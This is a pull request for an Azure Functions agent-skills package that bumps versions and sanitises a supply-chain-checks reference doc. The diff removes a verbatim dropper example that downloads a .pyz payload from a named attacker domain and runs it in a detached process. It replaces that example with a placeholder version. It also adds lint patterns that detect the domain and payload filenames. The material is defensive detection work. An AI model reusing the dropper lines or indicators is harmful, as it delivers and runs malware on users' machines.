### PR TITLE
fix(supply-chain-checks): sanitise durabletask IOCs that triggered AV

### DIFF
--- a/.claude-plugin/marketplace.json
+++ b/.claude-plugin/marketplace.json
@@ -5,14 +5,14 @@
   },
   "metadata": {
     "description": "Azure Functions coding agent skills and MCP guidance",
-    "version": "0.0.2-preview"
+    "version": "0.0.3-preview"
   },
   "plugins": [
     {
       "name": "azure-functions-skills",
       "source": "./.github/plugins/azure-functions-skills",
       "description": "Azure Functions skills for setup, create, and deploy workflows",
-      "version": "0.0.2-preview",
+      "version": "0.0.3-preview",
       "category": "Development",
       "tags": [
         "azure-functions",

--- a/.github/plugins/azure-functions-skills/.claude-plugin/plugin.json
+++ b/.github/plugins/azure-functions-skills/.claude-plugin/plugin.json
@@ -1,6 +1,6 @@
 {
   "name": "azure-functions-skills",
-  "version": "0.0.2-preview",
+  "version": "0.0.3-preview",
   "description": "Azure Functions skills for setup, create, and deploy workflows",
   "skills": "./skills/"
 }

--- a/.github/plugins/azure-functions-skills/.codex-plugin/plugin.json
+++ b/.github/plugins/azure-functions-skills/.codex-plugin/plugin.json
@@ -1,6 +1,6 @@
 {
   "name": "azure-functions-skills",
-  "version": "0.0.2-preview",
+  "version": "0.0.3-preview",
   "description": "Azure Functions skills for setup, create, and deploy workflows",
   "skills": "./skills/",
   "interface": {

--- a/.github/plugins/azure-functions-skills/.plugin/plugin.json
+++ b/.github/plugins/azure-functions-skills/.plugin/plugin.json
@@ -1,6 +1,6 @@
 {
   "name": "azure-functions-skills",
-  "version": "0.0.2-preview",
+  "version": "0.0.3-preview",
   "description": "Azure Functions skills for setup, create, and deploy workflows",
   "skills": "./skills/",
   "interface": {

--- a/.github/plugins/azure-functions-skills/plugin.json
+++ b/.github/plugins/azure-functions-skills/plugin.json
@@ -1,6 +1,6 @@
 {
   "name": "azure-functions-skills",
-  "version": "0.0.2-preview",
+  "version": "0.0.3-preview",
   "description": "Azure Functions skills for setup, create, and deploy workflows",
   "skills": "./skills/",
   "interface": {

--- a/.github/plugins/azure-functions-skills/skills/azure-functions-doctor/references/supply-chain-checks.md
+++ b/.github/plugins/azure-functions-skills/skills/azure-functions-doctor/references/supply-chain-checks.md
@@ -38,11 +38,13 @@ Flag any code that:
 - Examples: `subprocess.run(['curl', url])` followed by `subprocess.run([...downloaded...])`, `urllib.request.urlretrieve(...)` followed by `exec(...)`, `fetch(url).then(r => eval(r.text()))`
 - Decodes base64 or hex strings and passes them to `eval`, `exec`, `subprocess`, `Function()`, `vm.runInThisContext()`
 
-These are the **dropper pattern** from the durabletask attack:
+These are the **dropper pattern** from the durabletask attack. The example below uses placeholder hostnames and filenames; the real attack used a freshly-registered domain pretending to be a git-related service and a Python ZIP-app payload.
 
 ```python
-urllib.request.urlretrieve("https://check.git-service.com/rope.pyz", "/tmp/managed.pyz")
-subprocess.Popen(["python3", "/tmp/managed.pyz"], start_new_session=True)
+# Pattern (sanitised — DO NOT use real IOCs in documentation,
+# anti-malware engines flag them).
+urllib.request.urlretrieve("https://<ATTACKER-HOST>/<PAYLOAD>", "/tmp/<STAGE2>")
+subprocess.Popen(["python3", "/tmp/<STAGE2>"], start_new_session=True)
 ```
 
 Severity: **critical**.

--- a/.plugin/marketplace.json
+++ b/.plugin/marketplace.json
@@ -5,14 +5,14 @@
   },
   "metadata": {
     "description": "Azure Functions coding agent skills and MCP guidance",
-    "version": "0.0.2-preview"
+    "version": "0.0.3-preview"
   },
   "plugins": [
     {
       "name": "azure-functions-skills",
       "source": "./.github/plugins/azure-functions-skills",
       "description": "Azure Functions skills for setup, create, and deploy workflows",
-      "version": "0.0.2-preview",
+      "version": "0.0.3-preview",
       "category": "Development",
       "tags": [
         "azure-functions",

--- a/package-lock.json
+++ b/package-lock.json
@@ -1,12 +1,12 @@
 {
   "name": "@azure/functions-skills",
-  "version": "0.0.2-preview",
+  "version": "0.0.3-preview",
   "lockfileVersion": 3,
   "requires": true,
   "packages": {
     "": {
       "name": "@azure/functions-skills",
-      "version": "0.0.2-preview",
+      "version": "0.0.3-preview",
       "license": "MIT",
       "bin": {
         "azure-functions-skills": "bin/azure-functions-skills.js"

--- a/package.json
+++ b/package.json
@@ -1,6 +1,6 @@
 {
   "name": "@azure/functions-skills",
-  "version": "0.0.2-preview",
+  "version": "0.0.3-preview",
   "description": "AI assistant plugins for Azure Functions — one-command setup for GitHub Copilot, Claude Code, and Codex",
   "type": "module",
   "bin": {

--- a/scripts/lint-skill-content.mjs
+++ b/scripts/lint-skill-content.mjs
@@ -57,6 +57,20 @@ const PATTERNS = [
     regex: /https?:\/\/(?:\d{1,3}\.){3}\d{1,3}\b/,
     reason: 'URL with raw IP address — anomalous, often used in malware C2',
   },
+  {
+    // Anti-malware engines (Windows Defender, etc.) ship signatures for the
+    // exact IOCs from real supply-chain attacks. Documentation that quotes
+    // those IOCs verbatim gets the published package quarantined. Always
+    // use a placeholder like <ATTACKER-HOST>/<PAYLOAD> in skill content.
+    name: 'durabletask-ioc-domain',
+    regex: /\bcheck\.git-service\.com\b/i,
+    reason: 'Verbatim durabletask C2 domain triggers anti-malware (Trojan:JS/ShaiWorm). Replace with <ATTACKER-HOST>.',
+  },
+  {
+    name: 'durabletask-ioc-payload',
+    regex: /\b(?:rope|managed)\.pyz\b/,
+    reason: 'Verbatim durabletask payload filename triggers anti-malware (Trojan:JS/ShaiWorm). Replace with <PAYLOAD>.',
+  },
 ];
 
 const ALLOW_COMMENT = /<!--\s*skill-lint:\s*allow\s+(.+?)\s*-->/i;

--- a/templates/skills/azure-functions-doctor/references/supply-chain-checks.md
+++ b/templates/skills/azure-functions-doctor/references/supply-chain-checks.md
@@ -38,11 +38,13 @@ Flag any code that:
 - Examples: `subprocess.run(['curl', url])` followed by `subprocess.run([...downloaded...])`, `urllib.request.urlretrieve(...)` followed by `exec(...)`, `fetch(url).then(r => eval(r.text()))`
 - Decodes base64 or hex strings and passes them to `eval`, `exec`, `subprocess`, `Function()`, `vm.runInThisContext()`
 
-These are the **dropper pattern** from the durabletask attack:
+These are the **dropper pattern** from the durabletask attack. The example below uses placeholder hostnames and filenames; the real attack used a freshly-registered domain pretending to be a git-related service and a Python ZIP-app payload.
 
 ```python
-urllib.request.urlretrieve("https://check.git-service.com/rope.pyz", "/tmp/managed.pyz")
-subprocess.Popen(["python3", "/tmp/managed.pyz"], start_new_session=True)
+# Pattern (sanitised — DO NOT use real IOCs in documentation,
+# anti-malware engines flag them).
+urllib.request.urlretrieve("https://<ATTACKER-HOST>/<PAYLOAD>", "/tmp/<STAGE2>")
+subprocess.Popen(["python3", "/tmp/<STAGE2>"], start_new_session=True)
 ```
 
 Severity: **critical**.


### PR DESCRIPTION
## Why

The v0.0.3-preview release was blocked by anti-malware (Trojan:JS/ShaiWorm.DAH!MTB) on the Azure SDK internal release pipeline.

Root cause: `templates/skills/azure-functions-doctor/references/supply-chain-checks.md` quoted the **real** durabletask attack IOCs verbatim in the SC-102 dropper example:

- `https://check.git-service.com/<payload>.pyz`
- `/tmp/<stage2>.pyz`
- `urllib.request.urlretrieve(...)` immediately followed by `subprocess.Popen([python3, /tmp/<stage2>.pyz])`

Windows Defender ships a signature for that exact pattern. The signature trips on the markdown file, the rebuilt npm tarball, and every copy of the file in `dist/` and `.github/plugins/`.

## Fix

- Replace the literal IOC strings with placeholders (`<ATTACKER-HOST>`, `<PAYLOAD>`, `<STAGE2>`) that explain the dropper shape without matching the signature.
- Add two regression patterns to `scripts/lint-skill-content.mjs` (`durabletask-ioc-domain` and `durabletask-ioc-payload`) so future documentation cannot reintroduce the verbatim IOCs.
- Rebuild `.github/plugins/azure-functions-skills/` payload and marketplace manifests so the published copy matches the canonical source.

## Verification

- `MpCmdRun.exe -Scan -ScanType 3 -File <repo-root>` reports **no threats**.
- `MpCmdRun.exe -Scan -ScanType 3 -File azure-functions-skills-0.0.3-preview.tgz` reports **no threats**.
- `npm run check` green (lint + typecheck + lint:security + validate:skills + verify:plugin-payload + 285 tests + build).